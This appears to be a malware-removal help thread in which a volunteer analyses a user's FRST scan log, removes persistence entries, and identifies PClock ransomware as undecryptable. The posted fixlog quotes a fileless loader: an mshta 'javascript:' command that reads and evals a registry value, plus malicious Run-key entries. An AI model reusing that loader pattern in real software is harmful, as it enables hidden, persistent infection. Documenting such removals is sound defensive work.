2017-06-14 23:07 - 2017-05-12 21:03 - 00629760 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00400896 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00306688 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00038912 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00010240 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-06-14 23:07 - 2017-05-12 20:45 - 00097792 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-06-14 23:07 - 2017-05-12 20:45 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-06-14 23:07 - 2017-05-12 20:45 - 00029696 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-06-14 23:07 - 2017-05-12 20:45 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-06-14 23:07 - 2017-05-12 20:44 - 02401792 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-06-14 23:07 - 2017-05-12 20:43 - 00262656 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-06-14 23:07 - 2017-05-12 20:43 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2017-06-14 23:07 - 2017-05-12 20:41 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-06-14 23:07 - 2017-05-12 19:25 - 01251328 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-06-14 23:07 - 2017-05-12 19:25 - 00909824 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-06-14 23:07 - 2017-05-10 18:16 - 00091368 _____ (Microsoft Corporation) C:\Windows\system32\MigAutoPlay.exe
2017-06-14 23:07 - 2017-05-10 18:12 - 12880896 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2017-06-14 23:07 - 2017-05-10 18:12 - 02953216 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2017-06-14 23:07 - 2017-05-10 18:12 - 01499648 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2017-06-14 23:07 - 2017-05-10 18:12 - 00174080 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2017-06-14 23:07 - 2017-05-10 18:10 - 00073728 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2017-06-14 23:07 - 2017-05-10 18:01 - 02092032 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2017-06-14 23:07 - 2017-05-10 18:00 - 00573440 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2017-06-14 23:07 - 2017-05-10 18:00 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2017-06-14 23:07 - 2017-05-10 18:00 - 00093696 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2017-06-14 23:07 - 2017-05-10 18:00 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2017-06-14 23:07 - 2017-05-10 18:00 - 00035328 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2017-06-14 23:07 - 2017-05-10 18:00 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2017-06-14 23:07 - 2017-05-10 18:00 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2017-06-14 23:07 - 2017-05-10 17:47 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2017-06-14 23:07 - 2017-05-09 18:11 - 00779776 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2017-06-14 23:07 - 2017-05-09 18:11 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2017-06-14 23:07 - 2017-05-07 18:14 - 00078568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2017-06-14 23:07 - 2017-05-07 17:53 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2017-06-14 23:07 - 2017-04-28 01:50 - 03550208 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_47.dll
2017-06-14 23:07 - 2017-03-30 17:58 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\rundll32.exe
2017-06-11 12:39 - 2017-06-19 23:49 - 01035250 _____ C:\Users\Sachyani\Downloads\53500 (2).xlsx
2017-06-11 12:39 - 2017-06-19 23:49 - 01035250 _____ C:\Users\Sachyani\Downloads\53500 (1).xlsx
2017-06-11 12:38 - 2017-06-19 23:49 - 01035250 _____ C:\Users\Sachyani\Downloads\53500.xlsx
2017-06-05 14:24 - 2017-06-19 23:50 - 00421005 _____ C:\Users\Sachyani\Downloads\זימון ממרכז רפואי תל-אביב ע_ש סוראסקי.PDF
2017-06-04 14:29 - 2017-06-04 14:29 - 00000000 ____D C:\Users\Sachyani\AppData\Local\752c
2017-06-04 14:02 - 2017-06-04 14:03 - 10768856 _____ (Xvid Team) C:\Users\Sachyani\Downloads\Xvid-1.3.2-20110601.exe
2017-06-04 14:02 - 2017-06-04 14:02 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017 (6).torrent
2017-06-04 14:01 - 2017-06-04 14:01 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017 (5).torrent
2017-06-04 13:59 - 2017-06-24 00:31 - 00000000 ____D C:\Users\Sachyani\AppData\Local\Ilsoft
2017-06-04 13:58 - 2017-06-04 14:03 - 00000000 ___HD C:\Users\Sachyani\AppData\Local\SysHashTable
2017-06-04 13:37 - 2017-06-04 14:05 - 00000000 ____D C:\Users\Sachyani\AppData\Roaming\vlc
2017-06-04 13:35 - 2017-06-04 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2017-06-04 13:35 - 2017-06-04 13:35 - 00000000 ____D C:\Program Files\VideoLAN
2017-06-04 13:34 - 2017-06-04 13:34 - 30950664 _____ C:\Users\Sachyani\Downloads\vlc-2.2.6-win32.exe
2017-06-04 13:10 - 2017-06-04 13:10 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017 (4).torrent
2017-06-04 13:08 - 2017-06-04 13:08 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017 (3).torrent
2017-06-04 13:08 - 2017-06-04 13:08 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017 (2).torrent
2017-06-04 13:06 - 2017-06-04 13:06 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017 (1).torrent
2017-06-04 13:06 - 2017-06-04 13:06 - 00033020 _____ C:\Users\Sachyani\Downloads\The Other Half 2016.torrent
2017-06-04 01:00 - 2017-06-04 01:00 - 00165003 _____ C:\Users\Sachyani\Downloads\THE-ZOOKEEPERS-WIFE-HDRip.XVid_.ETRG_.torrent
2017-06-04 00:56 - 2017-06-04 00:56 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017.torrent
2017-06-02 13:40 - 2017-06-02 13:40 - 00029810 _____ C:\Users\Sachyani\Downloads\1F6BF1BDA08EC966D39279A30D0A0C325706B69E.torrent
2017-05-30 12:54 - 2017-06-19 23:49 - 00050064 _____ C:\Users\Sachyani\Downloads\EX883414.tif
2017-05-29 00:42 - 2017-06-19 23:49 - 05287055 _____ C:\Users\Sachyani\Downloads\IMG_0891 (1).MOV
2017-05-29 00:42 - 2017-06-19 23:49 - 05254633 _____ C:\Users\Sachyani\Downloads\IMG_0891.MOV
2017-05-29 00:42 - 2017-06-19 23:49 - 05202730 _____ C:\Users\Sachyani\Downloads\IMG_0891 (2).MOV
2017-05-29 00:41 - 2017-06-19 23:49 - 03537750 _____ C:\Users\Sachyani\Downloads\IMG_0892.MOV
2017-05-29 00:41 - 2017-06-19 23:49 - 02568086 _____ C:\Users\Sachyani\Downloads\IMG_0890.MOV
2017-05-28 00:06 - 2017-05-28 00:06 - 00000000 ____D C:\Users\Sachyani\AppData\Roaming\Google
2017-05-27 09:58 - 2017-05-27 09:58 - 00018514 _____ C:\Users\Sachyani\Downloads\BLeumi_20170527095759_39266945_TochnitChisachonYeled.htm
2017-05-27 09:04 - 2017-05-27 09:04 - 00015650 _____ C:\Users\Sachyani\Downloads\Monsters, Inc. (2001) [1080p] [YTS.AG].torrent
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-06-24 22:41 - 2017-02-25 16:33 - 00000000 ____D C:\Users\Sachyani\AppData\LocalLow\Mozilla
2017-06-24 22:27 - 2017-02-25 16:32 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2017-06-24 22:09 - 2009-07-14 05:37 - 00000000 ____D C:\Windows\inf
2017-06-24 07:49 - 2009-07-14 07:34 - 00021664 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-06-24 07:49 - 2009-07-14 07:34 - 00021664 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-06-24 00:35 - 2009-07-14 07:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-06-24 00:35 - 2009-07-14 07:33 - 00453664 _____ C:\Windows\system32\FNTCACHE.DAT
2017-06-24 00:05 - 2017-02-18 14:49 - 00122064 _____ C:\Users\Sachyani\AppData\Local\GDIPFONTCACHEV1.DAT
2017-06-20 14:56 - 2017-02-18 14:28 - 00000000 ____D C:\Users\Sachyani
2017-06-19 23:50 - 2017-03-27 20:14 - 00124505 _____ C:\Users\Sachyani\Downloads\PdfConvertor.pdf
2017-06-19 23:50 - 2017-03-09 09:55 - 00594236 _____ C:\Users\Sachyani\Downloads\כימיה כללית סמסטר א מועד ב תשעז.pdf
2017-06-19 23:50 - 2017-03-09 09:55 - 00546626 _____ C:\Users\Sachyani\Downloads\כימיה כללית סמסטר א מועד א תשעז.pdf
2017-06-19 23:50 - 2017-02-18 16:14 - 446943900 _____ C:\Users\Sachyani\Downloads\Office Pro Plus 2013 Sp1 x86 VL He.part3.rar
2017-06-19 23:50 - 2017-02-18 16:12 - 449839104 _____ C:\Users\Sachyani\Downloads\Office Pro Plus 2013 Sp1 x86 VL He.part2.rar
2017-06-19 23:49 - 2017-05-12 09:54 - 00012759 _____ C:\Users\Sachyani\Downloads\DOC110517.pdf
2017-06-19 23:49 - 2017-05-07 10:39 - 04661680 _____ C:\Users\Sachyani\Downloads\2017-05-07-VIDEO-00000814.mp4
2017-06-19 23:49 - 2017-04-08 10:24 - 00121782 _____ C:\Users\Sachyani\Downloads\File_1.pdf
2017-06-19 23:49 - 2017-04-07 22:33 - 00339365 _____ C:\Users\Sachyani\Downloads\DATE-0417_CARD-0938.pdf
2017-06-19 23:49 - 2017-03-27 19:42 - 00175886 _____ C:\Users\Sachyani\Downloads\obligation_form (1).pdf
2017-06-19 23:49 - 2017-03-26 13:16 - 00161605 _____ C:\Users\Sachyani\Downloads\labL00806878201703231305.pdf
2017-06-19 23:49 - 2017-03-24 01:31 - 00046910 _____ C:\Users\Sachyani\Downloads\Appointment1.pdf
2017-06-19 23:49 - 2017-03-24 01:29 - 00245959 _____ C:\Users\Sachyani\Downloads\Appointment.pdf
2017-06-19 23:49 - 2017-03-19 00:11 - 00246907 _____ C:\Users\Sachyani\Downloads\college-Calendar-16-17.pdf
2017-06-19 23:49 - 2017-03-19 00:11 - 00184640 _____ C:\Users\Sachyani\Downloads\college-Calendar-17-18.pdf
2017-06-19 23:49 - 2017-02-28 01:05 - 00175833 _____ C:\Users\Sachyani\Downloads\obligation_form.pdf
2017-06-19 23:49 - 2017-02-18 16:11 - 449839104 _____ C:\Users\Sachyani\Downloads\Office Pro Plus 2013 Sp1 x86 VL He.part1.rar
2017-06-16 00:48 - 2017-02-18 16:15 - 00000000 ____D C:\Users\Sachyani\AppData\Roaming\uTorrent
2017-06-16 00:38 - 2009-07-14 05:37 - 00000000 ____D C:\Windows\rescache
2017-06-15 03:46 - 2010-11-21 00:01 - 00781298 _____ C:\Windows\system32\PerfStringBackup.INI
2017-06-15 03:37 - 2009-07-14 05:37 - 00000000 ____D C:\Windows\system32\migwiz
2017-06-15 03:21 - 2017-02-18 20:30 - 00000000 ____D C:\Windows\system32\MRT
2017-06-15 03:17 - 2017-02-18 20:30 - 130903960 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-06-15 03:17 - 2017-02-18 16:30 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2017-06-15 03:15 - 2009-07-14 05:04 - 00000478 _____ C:\Windows\win.ini
2017-06-12 13:26 - 2017-03-26 23:44 - 00000000 ___RD C:\Users\Sachyani\Documents\Scanned Documents
 
==================== Files in the root of some directories =======
 
2017-06-19 23:46 - 2017-06-19 23:46 - 15791980 _____ () C:\Users\Sachyani\AppData\Roaming\Microsoft\en_files.txt
2017-06-19 23:46 - 2017-06-20 14:56 - 15715756 _____ () C:\Users\Sachyani\AppData\Roaming\Microsoft\en_gfiles.txt
2017-06-23 01:53 - 2017-06-23 01:53 - 4320054 _____ () C:\Users\Sachyani\AppData\Roaming\Microsoft\wp.jpg
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-06-22 00:57
 
==================== End of FRST.txt ============================


BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 25 June 2017 - 11:57 AM

Hi sachyani :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

Please give me a few hours to review your logs and get back at you.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 25 June 2017 - 12:06 PM

Thank you for waiting.

warning.gifMalicious Programs Warning!

I noticed that you have malicious programs installed on your system. I'll ask you to uninstall them since uninstalling such programs before running malware removal tools will ensure a better clean-up.
  • KMSpico
If you have an issue when uninstalling a program, please let me know.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located);
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;

Attached Files


unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#4 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 25 June 2017 - 12:47 PM

Thank U for your time!

 

Just to get my expectations straight... Is there a chance i'll get my files decrypted?

 

Formatting the computer or paying the ransom - these are missions I don't want to waste your time on.

 

Since I posted this topic, I ran a scan by an Avira free anti-virus, and a SpyHunter4 scan (both were executed before I saw your reply...).

 

However, now I can't see that kmspico program on my control panel. Possibly I deleted it when I was attacked, beacause I couldn't explain myself what that was.

 

Found it. Will attempt to delete it in a minute.

 

KMSpico is deleted.


Edited by sachyani, 25 June 2017 - 01:18 PM.


#5 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 25 June 2017 - 01:29 PM

I've preformed the fixing process.

 

Here is the fixlog file:

 

Fix result of Farbar Recovery Scan Tool (x86) Version: 25-06-2017 01
Ran by Sachyani (25-06-2017 21:15:48) Run:2
Running from C:\Users\Sachyani\Downloads
Loaded Profiles: Sachyani (Available Profiles: Sachyani)
Boot Mode: Normal
 
==============================================
 
fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
 
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...\Run: [{C4B700E8-006B-9D20-AB99-2B0C8AECF8C0}] => C:\ProgramData\Microsoft\Performance\TheftProtection\temp\tmp37A2.exe <===== ATTENTION
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...\Run: [*kszo<*>] => "C:\Users\Sachyani\AppData\Local\752c\1cd2.bat" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...\Run: [27867b84] => C:\Users\Sachyani\AppData\Roaming\Microsoft\wxdsys.exe
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\Sachyani\AppData\Local\Ilsoft\mpqzunnc.dll ATTENTION
 
CHR Extension: (Flash Control) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdgadgplbbdjlbjgdociahdlmbglfeen [2017-05-28]
CHR Extension: (Save to Facebook) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfikkaogpplgnfjmbjdpalkhclendgd [2017-03-15]
CHR Extension: (Local SWF Player) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdmbckedabpbgjagmkgcejooabcdnone [2017-02-25]
 
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [965776 2014-10-26] (@ByELDI) [File not signed]
 
CustomCLSID: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 -> C:\Users\Sachyani\AppData\Local\Ilsoft\mpqzunnc.dll => No File
 
Task: {0F8FB102-3431-44D6-B625-4D6D1CC0035F} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe [2014-10-26] (@ByELDI)
Task: {D2CF2B55-1747-4356-9404-DA597EFCBE6E} - System32\Tasks\{382A2F75-534A-4306-BE2F-0C6B8B27EF1C} => pcalua.exe -a "E:\torrent_files\The Zookeepers Wife 2017\Ultra XVid Codec Pack (2).exe" -d "E:\torrent_files\The Zookeepers Wife 2017"
 
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\Classes\7ec8: "C:\Windows\system32\mshta.exe" "javascript:AK6JRZeR="irpBb";h34v=new ActiveXObject("WScript.Shell");Vfse1L2="E6NSp";JppN98=h34v.RegRead("HKCU\\software\\gwqcazcm\\tduo");N36IaYhce="86BB";eval(JppN98);bEJ4Fl="JgMF";" <===== ATTENTION
 
FirewallRules: [{FEE3EABA-D5F4-4725-B867-38F769B7018A}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{3592AE5C-92DE-4392-89A9-165A5C049494}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
 
C:\Program Files\KMSpico
C:\Program Files\ParetoLogic
C:\ProgramData\ParetoLogic
C:\ProgramData\Microsoft\Performance
C:\Users\Sachyani\AppData\Local\752c
C:\Users\Sachyani\AppData\Local\Ilsoft
C:\Users\Sachyani\AppData\Roaming\Microsoft\wxdsys.exe
 
EmptyTemp:
*****************
 
Processes closed successfully.
Restore point was successfully created.
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\Microsoft\Windows\CurrentVersion\Run\\{C4B700E8-006B-9D20-AB99-2B0C8AECF8C0} => value removed successfully.
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\Microsoft\Windows\CurrentVersion\Run\\*kszo<*> => value removed successfully.
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\Microsoft\Windows\CurrentVersion\Run\\27867b84 => value removed successfully.
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9} => key removed successfully.
C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdgadgplbbdjlbjgdociahdlmbglfeen => moved successfully
C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfikkaogpplgnfjmbjdpalkhclendgd => moved successfully
C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdmbckedabpbgjagmkgcejooabcdnone => moved successfully
Service KMSELDI => service not found.
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0F8FB102-3431-44D6-B625-4D6D1CC0035F} => key not found. 
C:\Windows\System32\Tasks\AutoPico Daily Restart => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoPico Daily Restart => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D2CF2B55-1747-4356-9404-DA597EFCBE6E} => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D2CF2B55-1747-4356-9404-DA597EFCBE6E} => key removed successfully.
C:\Windows\System32\Tasks\{382A2F75-534A-4306-BE2F-0C6B8B27EF1C} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{382A2F75-534A-4306-BE2F-0C6B8B27EF1C} => key removed successfully.
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\Classes\7ec8 => key removed successfully.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{FEE3EABA-D5F4-4725-B867-38F769B7018A} => value removed successfully.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3592AE5C-92DE-4392-89A9-165A5C049494} => value removed successfully.
C:\Program Files\KMSpico => moved successfully
"C:\Program Files\ParetoLogic" => not found.
C:\ProgramData\ParetoLogic => moved successfully
C:\ProgramData\Microsoft\Performance => moved successfully
C:\Users\Sachyani\AppData\Local\752c => moved successfully
C:\Users\Sachyani\AppData\Local\Ilsoft => moved successfully
"C:\Users\Sachyani\AppData\Roaming\Microsoft\wxdsys.exe" => not found.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 0 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 136331022 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 1962643870 B
Edge => 0 B
Chrome => 817474822 B
Firefox => 352462316 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 29571609 B
LocalService => 66228 B
NetworkService => 183326 B
Sachyani => 467306251 B
 
RecycleBin => 6362674774 B
EmptyTemp: => 9.4 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 21:20:41 ====


#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 25 June 2017 - 01:38 PM

Can you upload an encrypted file and a ransom note to ID-Ransomware, and copy/paste the result here? CryptoLocker has been killed off years ago, so I doubt you were hit with it.

https://id-ransomware.malwarehunterteam.com/

We need to find which Ransomware you were hit by first.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 25 June 2017 - 03:11 PM

PClock

 

Attached is the printscreen answer.

Attached Files



#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 25 June 2017 - 03:20 PM

Sadly as ID-Ransomware states, there's no way to decrypt files encrypted with the updated variant of PClock. The best thing you can do right now is back up all the encrypted files somewhere safe and hope that a free decryption solution will be released in the future.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#9 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 25 June 2017 - 04:06 PM

OK.

 

So what's the next step?

 

I really need access to these files.

 

Should I pay the bastards?



#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 25 June 2017 - 04:30 PM

So what's the next step?


It's as I told you before. You should back up your files somewhere safe and hope that a free decryption solution gets released in the future.

So what's the next step?


This would only encourage their business, and as someone who spends my time fighting against criminals like that, I cannot encourage you to do so. It's your choice.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#11 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 25 June 2017 - 04:43 PM

 

So what's the next step?


It's as I told you before. You should back up your files somewhere safe and hope that a free decryption solution gets released in the future.

So what's the next step?


This would only encourage their business, and as someone who spends my time fighting against criminals like that, I cannot encourage you to do so. It's your choice.

 

Fair enough.

 

Do we have any more steps needed to be done?



#12 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 25 June 2017 - 07:55 PM

Yes, I would like to run a few more scans on your system, as it appears that you were infected with malware other than PClock.

j1Bynr2.pngMalwarebytes - Clean Mode
  • Download and install the free version of Malwarebytes
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point;
